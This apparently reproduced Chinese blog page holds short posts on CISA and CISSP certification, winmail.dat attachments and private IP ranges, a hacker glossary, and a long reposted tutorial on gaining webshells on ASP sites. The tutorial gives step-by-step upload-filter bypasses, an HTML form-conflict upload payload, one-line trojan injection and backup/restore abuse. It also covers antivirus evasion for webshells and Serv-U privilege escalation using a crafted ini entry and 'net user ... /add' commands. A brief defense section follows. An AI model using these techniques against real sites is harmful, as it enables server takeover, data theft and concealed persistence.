日志分类:小菜乐园

信息技术审计师(CISA)认证要求

时间:2013年11月12日作者:小侃评论次数:0

CISA授予给那些致力于信息系统审计、控制和安全,并同时满足下列要求的个人:

成功通过CISA认证考试

信息系统审计、控制或安全的工作经验

遵循职业道德规范

完成后续教育计划

达到信息系统审计标准

成功通过CISA认证考试

所有从事信息系统审计、控制和安全的个人,都可以报名参加考试。成绩合格的个人,将会收到ISACA寄来的CISA申请材料和考试成绩。对于如何通过认证考试,请参阅考试指导和CISA考试复习材料。

信息系统审计、控制或安全的工作经验

获得CISA认证的最低工作经验要求,为五年的信息系统审计、控制或安全的从业经历。不过,存在下列等价替代方案:

一年的信息系统经验或运营审计经历,至多可以替代一年的信息系统审计、控制或安全经历
大学专科毕业和学士学位获得者分别视同拥有1年和2年的信息系统审计、控制或安全经历。

讲授计算机科学、财务或信息系统审计课程的全日制大学讲师,2年的大学执教经历可以替代1年的信息系统审计、控制或安全经历。

所谓有效的工作经历,是指回溯至申请日之前十年以内,后至通过CISA考试日五年为限。所有工作经历都经与雇主单独核实确认,方为有效。

遵循职业道德规范

所有ISACA会员和CISA持有人必须以职业道德规范(The Code of Professional Ethics)约束执业活动和个人行为。

完成后续教育计划

维持每年至少20小时的后续教育,同时,每三年必须累计达到120学时的后续教育。请参考后续教育政策(Continuing Education Policy)

 达到信息系统审计标准

CISA持有人必须坚持ISACA发布的信息系统审计标准(Information Systems Auditing Standards)

CISSP认证考试介绍

时间:2013年11月12日作者:小侃评论次数:0

CISSP考试由国际信息系统安全认证协会(Internationa Information Systems Security Cerification Consortium)管理.(ISC)2是一个全球性的非盈利性组织,它有四个主要的任务目标:

* 维护信息系统安全领域的通用知识体系;

*为信息系统安全专业人士和从业者提供认证;

*从事认证考试的培训和对认证考试进行的管理;

*通过连续教育培训,对有资格的认证候选人的授权工作进行管理.

(ISC)2由董事会运作,董事会成员从经过认证的从业者中按级别进行选举.有关(ISC)2更多信息,可以从网站www.isc2.org中获得.

CISSP和SSCP

(ISC)2支持并提供两种主要的认证考试:CISSP和SSCP.这些认证考试用来对所有行业的IT安全专业人士进行知识和技能的强化。CISSP是为从事组织机构中负责实施安全基础体系的安全专业人士设计的认证考试.CISSP认证考试涵盖了先前列出的10个CBK领域的知识.SSCP认证考试涵盖了7个CBK邻域的知识.

*访问控制

*管理

*审计和监控

*密码技术

*数据通信

*恶意代码/Malware

*风险、响应和灾难恢复

CISSP和SCP认证考试内容所涉及的领域有重复的地方,但它们有各自不同的侧重点,CISSP关注理论和设计而SSCP更多关注安全实施的内容。

道德规范

(ISC)2已经定义了成为CISSP所必须满足的几项资格.首先,你必须是一位至少有4年安全从业经验或3年经验加学士学位的专业人士.专业经验的定义是:在10个CBK领域中的一个或多个领域从事有工资收入的安全工作.

其次,你必须同意遵守道德规范,CISSP的道德规范是一套准则,为了维护信息系统安全领域的职业道德,(ISC)2希望所有的CISSP候选人都要遵守.你可以在(ISC)2网站www.isc2.org的信息部分找到这些规范准则.

要想报名参加考试,请访问(ISC)2的网站,并按照所列出的参加CISSP考试的指导完成注册,请提供你的联系方式,付款信息和有关安全行业的专业经验,你还要选择可以参加考试的时间和地点,一旦(ISC)2同意你参加考试,你将会收到一封进行确认的电子邮件,在邮件中你会找到有关测试中心和如何参加考试的详细信息.

CISSP考试概述

CISSP考试由250个问题组成,用6个小时完成.考试时使用一本小册子和答案纸,也就是说,你要使用铅笔来填写答案框.

CISSP考试从很深的角度关注安全,它更注重安全理论和概念,面不是实施过程和方法考试所涉及的范围非常宽,但不是很深,为了成功通考试,你需要熟悉每个领域,但没有必要成为每个邻域的专家.

你需要通过(ISC)2的网站ww.isc2.org来进行考试注册

(ISC)2负责管理考试,在大多数情况下,考试在酒店的大会议室中举行,CISSP现在的所有者作为考试的监考人或系统管理员,请保证在早上8:00左右到达考试中心,并且记住早上8:30之后进入考场是不允许的.

CISSP考试问题的类型

CISSP考试的每一道题有四个选项,但只有一个正确答案.下面是一个例子:

1.What is the most important goal and top priority of a security solution?

A.Prevention of disclosure

B.Maintaining integrity

C.Human safety

D.Sustaining availability

你必须选择一个正确的或是最合适的答案,并把它标记在你的答案纸上,在一些情况中,正确答案是非常明显的,但在有些情况中,可能会有几个答案看上去都是正确的.在这个时候,你必须选择对于这道问题最合适的答案.留意那些一般性的、明确的、全面的、扩展集和子集的答案选项。如果在某些情况下,似乎没有一个答案正确,那么你就要选择错误的可能性最小的答案.

参加考试的建议

参加CISSP考试时有两个关键要素.首先,需要了解10个CBK领域所涉及的内容,其次,一定要有很好的参加测试的技巧,要想在6个小时内完成250个问题的考试,回答每个问题所需的时间不能超过90秒.因此,速度快很重要,虽然不能仓促但也不要浪费时间.

要记住,猜测答案也比不回答问题强,如果你跳过一个问题,将没有得分,但是,如果猜测答案,至少有25%的正确机会,答案错误码率是不扣分的,因此,在6个小时考试快结束的时候,确认答案纸上的每一道题都有答案.

你可以在测试的小册子上写字,但字在上面的任何东西都不会用来计算得分,可以使用小册子做笔记和掌握考试进度,我们建议,在你把答案标记在答案纸上之前,再看一下你选择的每一个答案.

为了激发你参加考试的最大潜能,以下是一些一般性的指导原则:

1.首选项回答容易的问题

2.跳过较难的问题,稍后再返回来思考.为了记住被跳过的问题,在测试小册子的封面上记下它们的题号.

3.在选择正确的答案之前,先排除错误的答案

4.注意双重否定的问题.

5.确认了解问题问的是什么.

合理安排时间,你应该在一小时之内回答大约50个问题.这样,可以留下一个小左右的时间用来重新考虑跳过的问题.

一定注意要把答案填写在答案纸上的正确的题号下,最容易犯的错误就是考试小册子上的题号与答案纸上的题号顺序发生了错位.

学习和考试的准备要领

在CISSP考试学习的过程中,我们建议安排一个月的时间进行学习或每晚强化学习,这里有一些提议,可以帮助你充分利用学习时间.你可以根据自已的学习习惯来安排它们:

花一到两个晚上阅读每一章的内容并进行复习.

参加本书和选配光碟上所提供的所有练习考试.

从网站www.isc2.org上查阅(ISC)2的教程.

使用闪存卡强化你对概念的理解。

恼人的winmail.dat及解决办法

时间:2013年10月04日作者:小侃评论次数:0

如果你使用非Outlook软件来处理来自Outlook以及Exchange Server的E-mail,你很可能会遇到附件为winmail.dat的邮件,而你完全不知道这个附件如何打开,甚至更惨的是原本附件在邮件中的文件也不幸被这个winmail.dat吃掉了。你也许会询问这封邮件的发件人,这个时候对方多半也是一头雾水,因为人家用Outlook用的好好的,从来没有听说过这个问题,说得直白一点,就是完全不知道你在说什么。

那到底这个winmail.dat是什么呢?是MS的工具在编码打包你的邮件进行发送时,如果按照默认指定的RTF格式,会把格式信息按照MS自己的一套标准存放在邮件体中,造成非Outlook客户端不认识,无法正确解析。Well done, Redmond.

怎么办呢?两个方案:
1- 如果可能,向发件人建议不要使用Outlook或者至少让他/她发送邮件时不要使用RTF格式,纯文本或HTML均可。(注意如果修改全局设置没有效果的话,可能还需要单独修改每一个存在通讯录里的联系人。)
2- 如果没办法让邮件的发送人对他/她使用的邮件客户端作任何调整,你也可以下载winmail.dat阅读器,如http://www.winmail-dat.com/winmail-reader-setup.exe ,或者通过Google寻找其他类似工具。

强烈呼吁大家使用符合open standards的工具,尤其是在日常交流中日益重要的E-mail上,这是对你邮件的接收者最基本、也最直接的尊重。

判断某IP事内网还是外网的办法

时间:2013年06月17日作者:小侃评论次数:0

今天有盟友问我111.79.182.10到底是内网IP还是外网IP。

其实是外网IP,为什么呢?

我们必须首先了解内网、公网是什么?
公网、内网是两种Internet的接入方式。
内网接入方式:上网的计算机得到的IP地址是Inetnet上的保留地址,保留地址有如下3种形式:
10.x.x.x
172.16.x.x至172.31.x.x
192.168.x.x
内网的计算机以NAT(网络地址转换)协议,通过一个公共的网关访问Internet。内网的计算机可向Internet上的其他计算机发送连接请求,但Internet上其他的计算机无法向内网的计算机发送连接请求。
公网接入方式:上网的计算机得到的IP地址是Inetnet上的非保留地址。
公网的计算机和Internet上的其他计算机可随意互相访问。

那么我们要如何检测公网和内网呢?

请用上面介绍的查看IP地址的办法,检查一下您的电脑里有没有这个IP地址。如果有,您就是通过公网接入Internet,否则,就是通过内网接入Internet。

请注意:

1、如果您的浏览器里设置了使用代理服务器,请清除代理服务器设置,并刷新本页面,之后再检测。

2、有些学校或大型的机关单位虽然分配公网IP给用户,但学校或单位为了安全起见,会封闭校外对校内的访问请求。这部分用户虽然有公网IP地址,但依然要用内网动态域名来建网站。如果您通过校园网或机关单位的网络上网,并检测到自己有公网IP,请您在本机调试好网站后,把防火墙打开,请外网的朋友通过IP地址来访问您的网站。如果能访问,就是公网;如果不能访问,就是内网。

后台拿webshell的超全教程

时间:2012年06月23日作者:小侃评论次数:0

 感谢大家的支持,希望大家以后继续支持我们——中国蓝客联盟

                  主站:http://www.chnlanker.com

                  论坛:http://bbs.chnlanker.com

                  文化:http://www.chnhacker.com

小侃寄语:仅供大家学习交流哦~切记慎用!

1 上传
说到上传获得webshell,就不得不提大名鼎鼎的动网7.0SP2之前的文件上传漏洞了,那可是连官司方都没能幸免于难的啊!其中的成因吗不太好说,大概地说就是字符截断的问题。我们还是来看看怎么利用吧。这里我们要请出老兵的万能上传工具呢(图76),为什么叫万能上传工具呢?很简单,因为连大名鼎鼎的动网论坛都没有注意到这个严重漏洞,其它许多系统自然也避免不了,所以说这个工具是“万能”的,下面我们找一个没打过SP2补丁的dvbbs,注册一个帐号,登录进去后看有没有禁止上传,如果没有禁止,我们就是提取当前cookies保存起来(怎么提取?又忘了不是,前面不是说过可以用修改cookies浏览器提取吗?)然后在万能上传工具处填好漏洞url,欲上传的文件和cookies等信息(图77),点“上传”,不一会就提示成功了(图78),我们现在来访问这个上传后的文件,看,是不是得到一个shell呢(图79)
当然,并不是所有的系统都能用这个方法上传的。下面我再总结几个常见的上传方法。
1、进入后台直接上传。有些系统对管理员可是十分信任的哦,进了后台只要找到有上传的地方你就可以直接选匹马放上去,绝不会有任意阻拦(图80)。
2、添加上传类型上传。如果不能直接上传,可找找看有没有添加上传类型的地方,有的话添加一个ASP就可以了。当然,有些系统在代码中就限定了不允许上传ASP文件,不要紧,我们可以添加允许上传ASA、CER等文件,然后把.asp的后缀改为ASA或CER上传,一样可用的(图81)。
3、抓包上传。这里就要利用Win2000的一个小漏洞了,如果文件名的结尾是空格或“.“号,那么windows会自动把这个符号“吃”掉。那么,我们就可以添加允许上传“ASP ”文件,注意ASP后有个空格,ASP 可不等于ASP啊,所以代码里的限制就没用了。然后我们来到文件上传界面,选择一个ASP文件,先别上传。我们打开抓包工具Wsock Expert(图82),选择监控IE的上传窗口,然后回到上传界面,点击上传,提示上传失败。预料之中。我们来到Wsock Expert,找到刚才提交的数据包(图83),看到那个mm.asp没有,我们在这个后面加个空格,再用NC提交,成功上传!
4、利用表单冲突上传。用这个方法最典型的就是动力3.51的上传了。我们同样注册一个用户,来到发表文章处。切换到“源代码”模式,输入下面的代码:
<FORM name=form1 action=upfile_article.asp method=post encType=multipart/form-data><INPUT type=file name=FileName> <INPUT type=file name=FileName><INPUT style=”BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal” type=submit value=上传 name=Submit></FORM>
再来到“预览”模式,是不是看到了两个选择上传文件的框却只有一个上传按钮啊(图84)?我们在第一个框处选择一个ASP文件,第二个框处选择一个jpg文件,然后点上传。可能会提示冲突,但我们返回“源代码”模式,就可以看到我们上传后的Webshell地址了。
5、利用代码对文件类型的限制上传。现在许多代码为了安全都限制了上传ASP文件,但一些代码的限制方法实在令我不敢恭维。我见过有些代码的限制方式是一遇到ASP就把它去掉的。那么,我们完全可以添加一个上传类型“ASASPP”,这样一来,在上传过程中代码会把中间为ASP去掉,后缀的自然也就变为ASP的了。
6、利用其它上传工具。老兵的万能工具虽名为万能,但因为有些系统的上传代码与动网的是有差异的,所以这个工具对它就失效了。我这里还收集了别的一上上传利用专用程序。比如去缘雅境的,操作起来也十分简单,相信大家都会用的。
(2)写入过滤不完全,
因为现在许多系统都是可以用FSO功能直接写入其文件的,如果写入文件的过滤不完全,也可以直接往里写个webshell,如动易的conife.asp。这里我要讲的是leadbbs后台友情链接添加处写入webshell,我们来到后台的添加友情链接处,点“新增友情链接”(图85),然后在“网站名称处填上冰方后浪子微型ASP后门式海洋的一句话木马,其它乱填(图86),然后我们用客户端连接,成功了吧!(图87)
除了对文件写入的过滤外,还有对数据库写入的过滤。当我们暴库得知数据库后缀为ASP,但用网际快车能下载时,我们就可以确定这个数据库里不包含ASP语句,那么我们只要找到一个可以写入数据库的地方,写入一句话木马,再用客户端连接,一样可以成功的。
3、后台备分及恢复
说起后台的备分和恢复获取webshell,我可算是颇有研究,也可以说是从这里起步学习技术的,先说说常规的方法吧,一般地,我们就是把一个ASP木马改为gif后缀上传,然后记下上传后的地址,下面,我们来到数据备分页面(图88),在“数据库路径”处填自己刚才上传的文件名,在“备分后路径”处填自己想要种马的地址,注意后缀为ASP(图89),点“备分”后我们就得到了自己想要的webshell。
但是,如果像动力一样不允许定义当前数据库地址呢?一样可以的,我们通过暴库术式后台看到动力的数据库地址,因为ASP的话,我们一样可以把一个ASP木马改为gif的型式,然后上传,现在,我们来到“数据库恢复”页面,看到没有,可以自定义恢复数据库的路径(图90),我们选择我们刚才上传的文件路径,恢复(图91),恢复成功后整个系统是用不了,但我们只须直接访问数据库地址就可以得到webshell了,当然,为了不被别人发现最好还是先把数据库备分好,得到shell后再用shell恢复回去。
上面一般说的方法就是我发表的第一篇文件《利用ACCESS得到webshell一文的补充》,至此,数据备分和恢复的利用似乎完了,其实还没有,还是那个动力系统,如果我们无法得到数据库地址,或者数据是mdb的,出放到了web外,我们不就用不了上面的方法了吗?
别急,再绕个弯子,我们来仔细看看这个动力系统,备分处限制了只能备分当前的数据库,不能备分其它文件,且备分后文件后缀限为ASA,但可以自定义文件名。恢复处只能把数据恢复到当前数据库文件,如果遇上本段开头提的那三种情况,我们把一个shell恢复出来也是没用的。既然不能直接弄出来,我们就老老实实恢复一个比较正常的数据吧。说是比较正常,那是因为这个数据库虽然对系统没有影响,但还是做过一些手脚的。
我们拿一个相同系统的空数据库,把<%nodownload%>表中的内容改为一句话木马(图92),然后再在后台添加允许上传MDB文件,上传。下面到数据恢复处把刚上传的文件恢复回去,这时系统仍是正常运行的。我们重新用默认的用户名admin,密码admin888登录后,再到数据备分的地方,把数据备分出来,然后用客户端连接这个备分的文件就可以了。
对于限制没那么严的动网,我们可以直接备分就行了。虽然7.1中对备分处做了限制(图93),但恢复处可设限制(图94),条件比动力宽松多了。
4、SQL导出。对于有注入点的SQL站点,我们还可以用黑客界中的丐帮帮主——就是那个臭要饭的发明的SQL写入导出大法得到webshell,其原理是在知道网站物理路径的情况下通过往SQL数据库中写入一个带木马的表,再将这个表导出,就得到webshell了。为了不让管理人员发现,我们还要删掉这个新建的表。那个臭要饭的还专门对此写了工叫getwebshell的工具(图95),使用起来也并不复杂,我也就不再说了。
三、webshell的使用方法及提权
(1)webshell的基本使用方法
上面说了那么多,相信大家已经能够拿到属于自己的shell了吧。拿到webshell后该怎么使用啊?这是令许多菜鸟感到困惑的问题。下面,我就以海洋2006ASP木马为例说说webshell的一些基本使用方法。
首先,我们来下载海洋2006木马文件包,解压后会发现七个文件,它们分别是:2006.asp、unpack.vbs、2006×.exe、2006×2.exe、2006Z.ese、hididi.ini、ReadMe.Txt。其中2006.asp就是ASP木马的主文件,我们用记事本打开这个主文件,把默认密码lcxmarcos改为自己想要的密码,当然不改也行),然后用前面说的方法把这个文件放到网上去。用密码登录后,我们就可以看到如图96所示页面。这里列举了十三项大的功能,我只是就其中的一部分来讲解,其它的请各位自己去摸索。
首选看第8项功能:FSO文件浏览操作器,FSO大家应该很熟了吧,点击进入后我们可以看到如图97所示的界面。如果权限足够的话,我们可以在这里对服务器上任何的盘符进行包括新建,删除,读取,修改,修改属性,运行等文件操作,具体怎么做不用我教了吧?
下面再来看wscripc.shell程序运行器,进入该功能后会出现如图98所示界面,如果服务器不支持FSO,可以尝试在这里里输入cmd命令执行,例如我这里执行dir c:\,看C盘的目录是不是都列出来了呢(图99)。另外,如里用默认的cmd路径无法执行,我们可以自己上传一个cmd.exe到有执行权限的目录,然后填好文件路径再执行。
下面我们再来看看海洋2006ASP木马的第1—5项功能,这些有了是帮助我们收集服务信息的,有助于我们进一步的入侵。
进入“系统服务信息”后,我们就可以看到系统打开的所有服务和详细说明(图100)。
进入“服务器相关数据”后,我们就可以看到系统参数,系统磁盘,站点文件夹,终端端口等信息,如图101所示。
而“服务器组件探针”则可以列出服务器上各组件的名称和支持情况(图102)。
“系统用户和用户组信息”可以帮我们列出服务器上所有用户、用户组的详细信息(图103)。
客户端服务器交互信息是为我们列出服务器上Application、Session、cookies等信息的地方(图104)。
另外,第十一个功能“文件打包功能是海洋2006新增的一个亮点,它可以不用winrar打包服务器上的文件夹,无论是否支持FSO都能完成(图105),打包好后,我们可以在海洋2006木马的同级目录下找到hyfop.mdb文件,下载回来后用unpack.vb3解压就可以了(图106)。另外,如果服务器支持FSO,我们也可以用这个功能在服务器上解包。
海洋2006ASP木马还增加了“一些零碎的小东西”,其中比较实用的有注册表的读取功能(图107),填斥了注册表的键值路径后,点“读取”就能读出注册表键值了(图108)。
除了海洋ASP木马的主体文件外,它的压缩包里的其它文件也是大有用途,刚才说了unpack.vbs是解压打包为拥的,现在来说说,生成一句话代码的c/s端。前面讲入侵时我讲过许多次一句话木马,这个一句话木马怎么得到呢?其实可以用海洋的c/s端生成啊!运行2006×.exe,运行后如图109所示,按“打开”选择木马文件2006-asp,再填好服务端密码,按“转换”就会生成一个名为2006.asp.htm的客户端,然后再按“生成服务端页面”选择好存放路径及文件名后就生成一句话木马了,把这个木马插入到服务器的一个ASP文件中,用客户端连接,我们就可以往服务器写入任意代码了(图110)。
另外,我们还可以自己定制海洋2006的功能,如我们只需要FSO文件浏览器,我们就运行2006Z.exe(图111),在“页面选择”外选FSO文件浏览操作器,选择好源文件2006.asp和生成后的文件各后点“生成”一个只有FSO文件浏览器功能的木马就生成了(图112),是不是很方便啊?
(2)ASP木马的加密及防杀
随着ASP木马的泛滥,杀毒软件也打ASP木马列为严厉打击的对象。我们辛辛苦苦也得到了后台管理权上传webshell却被杀毒软件给kill了岂不太可惜了?别急,想想如果马儿被杀我们该怎么做呢?不错,要么换匹不被杀的,要么加壳。ASP木马也是一个理想,要么换,要么加密。
先说换吧,就ASP木马而言,海洋的名气最大,当然成为各杀毒厂商重点打击的对象了。既然海洋不能用,我们就用老兵的ASP站长助手6.0吧(如图113),不知是不是杀毒的真把这文件当成是站长的管理助手了,杀它的软件比杀海洋的少了许多,但其实这个文件的功能一点也不比海洋差。当然,ASP站长助手有时也是会被kill掉的,那我们就用海洋的一句话木马吧。可能是这一句话中的“特征码”不太好找吧,我一直没见有杀毒来杀它。什么,嫌一句话木马的功能不能强?看来只能拿出我的密秘武器——ASP站长助手aweige修改版了。这个ASP木马是aweige修改过的ASP站长助手,目前能免除一切杀毒软件的查杀,默认密码也“*”,进去后和ASP站长助手的界面是一样的。另外,文件不但目前免杀,可能永远都会免杀哦!因为我将此文件提交给杀毒厂商,他们竟说我的不是病毒(大家别BS我啊!)
还有一个免杀的方法就是对ASP木马进行加密。这里我们要用到一个工具——ASP木马加密免杀工具,这个工具操作很简单,如图114所示,选好木马的源文件,先点“转换”,过一会后再点“加密”就可以了,这里我就不多说了。
(3) weshell的提权
一个weshell的权限其实是很小的,我们要对weshell提权才能进行下一步的行动,下面我就给大家讲讲几个常用的提权方法。
1、serv-u的利用现在许多服务器都作为虚拟主机,自然大多数会选择serv-u做为stp的客户端,而serv-u的漏洞可是层出不穷,我们现在就来看怎么利用serv-u提升webshell的权限吧。
首先,我们要看serv-u的servvDaemon.ini是否可写,如果可写我们就可以很快得到管理员的权限了。
打开servvDaemon.ini后,我们灰[Domain]这一栏下加上user9=[nnsafe|1|0,其中数字9可以更换,然后在后面加上
[USER=cnnsafe|1]
password=
HomeDir=c:\winnt\systam32
Timeout=60
Maintenace=system
Accessl=c:\winnt\system32\RWAMELCDP
SKETValues=
如图114,保存后我们用ftp客户端登录,用户名为cnnsafe,密码为空,然后执行quote site execnet user cnnsafe cnnsafe/add和quote site exec net localgranp administrators cnnsafe/add,你就得到管理员权限了(图115)。
如果ServvDaemon.ini文件不可写,我们还可以用serv-v的本地溢出漏洞提权。找个可执行的目录,上传我们的提权工具su-exe,然后到wscriptshell中执行,执行成功后我们就可以得到服务器权限了(图116)。
另外,我们还可以看能否转跳到pcanywhere的目录,如果可以,我们就下载CIF文件,得到pcanywhere的密码登录。
常用的方法还有下载服务器的SAM表用LC5破解和把ASP.dll加入“特权组”,这里我就不多说了,大家可以自己去看相关资料。
三、防范篇
(一)暴库、注入的防范
有功就有防。对现在网络上流行的脚本攻击方法,虽然在整个攻击过程都是“合法”的,防火墙在这里起不了什么作用,但防范的方法还是有的。
先来看暴库的防范,其实防范暴库的方法很简单。前面我们说过,暴库都是利用服务器返回的信息达到目的的。我们不让服务器返回详细的错误信息不就可以了吗?我们可以来到IIS的应用程序配备,在“调试”选项的“脚本错误的错误信息”中选择“向客户端发送下列文件错误消息”(图117),这样服务器出错时就只会返回我们设定好的信息,暴库自然也不可能了。
如果是虚拟主机用户,我们可以在conn.asp后加上一句代码,On Error Resume Next“,这句话的意思是,如果出错继续执行下面的语句,不理会那个错误。因为这句话下面没有什么语句了,所以出错时会返回一片空白,当然你也可以在后面弄个假的数据加地址骗人,呵呵。另外,我们还可以在II3的映射中设置禁止询问.mdb的文件,或把数据库放到web外,如是虚拟空间的可建个表名nodown,内容为<%nodownload%>的表,然后把数据弯库改为.asp方式运行,这样即使不被暴库也下载不了。
对于注入攻击,现在网上有很多专用的防注入程序,以火防方式的SQL通用防注入程序2.0完美版为例,我们只须要在有漏洞的页面加上一句代码<1–#indade File=“wrsky_sql.asp”–>就可以实现对变量的过滤了,如果加在conn.asp后,因为对数据库进行调用的文件都要包含conn.asp,那么就可以对整站实现过滤,并且这个还可以自定义过滤的字符,把攻击者的攻击动作记录到数据库中。
另外,对于ASP+ACCESS,其实Md5也是入侵者的一大阻碍,除了我们自己把密码设复杂点,让对方难以破解外,我们还可以乞讨动Md5.asp中的部分代码来创造一个独一无二的Md5加密方法。打开Md5.asp,找到类似如下代码:把a=、b=、c=、d=后的那串随便选个改掉,只改一个就够了。这样一般是不会出错的。我们分别用原版的Md5.asp的改动后的Md5.asp加密密码123456,原版的密文(Md532)如下:
改动后的如下:
而一般的Md5破解工具都是按原版编写的,如果得不到我们改动后的Md5.asp文件,加密出来的密码是根本无法破解的。如图118、119所示。当然,我们也要保存好改动后的文件式记住改的地方,不然以后要用的时候我们自己也没有办法了。
这里再介绍一个最简单的替换Md5.asp的方法。因为许多系统都是有个默认的用户名和密码的,如果我们直接替换Md5.asp将无法登录后台,而且因为不知道改后的Md5.asp对某个密码加密后是什么形式,我们也无法直接改数据库。其实,我们只须用类似cookies欺骗的方法就可以了。先用默认的Md5.asp运行,登录后台后到添加管理员的界面,填好一切后再用ftp把改后的Md5.asp覆盖上去,因为这时网站还有你管理的cookies,所以点提交后还是能成功增加管理员的。退出后默认的管理员就登不上去了,但新增的却是可以的。我们就可以用新增那个登上去进行管理了。
还有就是,我们一般都会把数据库地址放得很隐秘,但如果遇到有没做防护的,有暴库漏洞的,系统也是没用的。万一被别人知道了用户名和明文密码怎么办呢?其实我们还可以隐藏后台地址,如果找不到后台得到用户名和密码也进行了后台。像cnnsafe的后台就是用几个我熟悉的数字或单词,中间用十分BT的特殊符号连接,这样自己又好记,而别人呢?别说猜,如果不是记忆超强恐怕给他看到后台地址也要N久才能记住。
(二)上传漏洞及数据备分,写入过滤不严的防范
对于脚本系统,另一个十分危险的地方就是上传了。上传文件的漏洞是层出不穷,其实我们完全可以自己修改代码解决这个问题。常规的上传文件都是取原文件名的后缀与上传的后的后缀相同,只改文件名部分。其实我们完全可以把文件扣缀全改为gif,一般情况下是不会影响图片显示的,如果是要上传非图片文件可以把后缀全改为sar,当然上传前要求先打包,否则改动后不知道原来的格式会无法打开。
以动力3.51为例,我们要以把 中 的改为。
对于数据库的备分,我建议删掉文件的备分和恢复的页面,要备分式恢复数据都用ftp直接下载式覆盖。而对于写入过滤不严,只要在conn.asp后加上防注入代码,是绝对会过滤完全的。
(三)旁注的防范
经过上面的配置,想直接在这个站上找脚本漏洞是比较难的了。那么自然会考虑旁注的防范,主要是依靠服务器的权限分配,如果服务器配得好,旁注是毫无用武之地的。另外,我最近还发现一个经典的防旁注的方法,就是先将域名的A记录绑到一个无用的IP上,再在下面把同一个域名绑到正确的IP上,这样WHOIS查询就会去查询那个无用IP上的信息,当然得不到结果了。
(四)入侵后的防范防范
如果你不幸被入侵了,网站上留下了webshell该怎么办呢,不急,亡羊补牢为时未晚。当然最好的方法是把文件全删了重传,而且还要注意数据库中有没有被 马。不过这其实是很不实际的做法。
其实我们可以用思易ASP木马追捕工具对木马文件进行追捕。调用FSO,有删掉,新建和上传功能的都能找出来,而且还能用关键字进行查找,如图4所示,看,这个工具使用方便,一下就找出隐藏在网站中的webshell了。
四、防范工具的安全性
在“防范篇”中给大家介绍了两个防范用的ASP文件,那这些工具自身的安全性怎么样呢?
1、防注入程序的安全性
其实火狐的SQL通用防注入程序也有漏洞,在2.0中我们可以无限量地提交信息使记录注入的数据库不断无限增大,在3.0版本中者有跨站漏洞,同时3.1B以前的版本都没有对COOKIES注入加以防范。
2、思易ASP木马追捕的安全性
其实这个程序本身并没有什么问题,但许多管理同偷懒,用完后记不得把文件删掉,这样别人就可以利用它来遍厉目录,找到数据库后下载,如图128所示是我用google搜到的结果,随便打开一个看,数据库地址出来了吧,还是.mdb的呢,还不快直接输入arl下载(图129)。
好了,关于ASP脚本的入侵及防范我就说到这里了,下面主产说我的个人学习经验。其实我的经验总结起来就是要善于观察,善于举一反三。另外就是要多实践,多问N个为什么。最后提醒一下,社会工程学在入侵时是很好用的。

                           感谢大家的支持,希望大家以后继续支持我们——中国蓝客联盟

                                               主站:http://www.chnlanker.com

                                               论坛:http://bbs.chnlanker.com

                                               文化:http://www.chnhacker.com

黑客术语大全

时间:2012年05月12日作者:小侃评论次数:0

1.肉鸡:所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉。

2.木马:就是那些表面上伪装成了正常的程序,但是当这些被程序运行时,就会获取系统的整个控制权限。有很多黑客就是 热中与使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等。

3.网页木马:表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。

4.挂马:就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。

5.后门:这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。这些改动表面上是很难被察觉的,但是入侵者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑,就好象是入侵者偷偷的配了一把主人房间的要是,可以随时进出而不被主人发现一样。通常大多数的特洛伊木马程序都可以被入侵者用语制作后门

6.rootkit:rootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDOWS下的system或者管理员权限)访问权限的工具。通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,rootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。

7.IPC$:是共享“命名管道”的资源,它是为了让进程间通信而开放的饿命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

8.弱口令:指那些强度不够,容易被猜解的,类似123,abc这样的口令(密码)

9.默认共享:默认共享是WINDOWS2000/XP/2003系统开启共享服务时自动开启所有硬盘的共享,因为加了”$”符号,所以看不到共享的托手图表,也成为隐藏共享。

10.shell:指的是一种命令指行环境,比如我们按下键盘上的“开始键+R”时出现“运行”对话框,在里面输入“cmd”会出现一个用于执行命令的黑窗口,这个就是WINDOWS的Shell执行环境。通常我们使用远程溢出程序成功溢出远程电脑后得到的那个用于执行系统命令的环境就是对方的shell

11.WebShell:WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做是一种网页后门。黑客在**了一个网站后,通常会将这些asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,好后就可以使用浏览器来访问这些asp 或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。可以上传下载文件,查看数据库,执行任意程序命令等。国内常用的WebShell有海阳ASP木马,Phpspy,c99shell等

12.溢出:确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有执行有效的检测而导致错误,后果可能是造成程序崩溃或者是执行攻击者的命令。大致可以分为两类:(1)堆溢出;(2)栈溢出。

13.注入:随着B/S模式应用开发的发展,使用这种模式编写程序的程序员越来越来越多,但是由于程序员的水平参差不齐相当大一部分应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想要知的数据,这个就是所谓的SQLinjection,即:SQL注入。

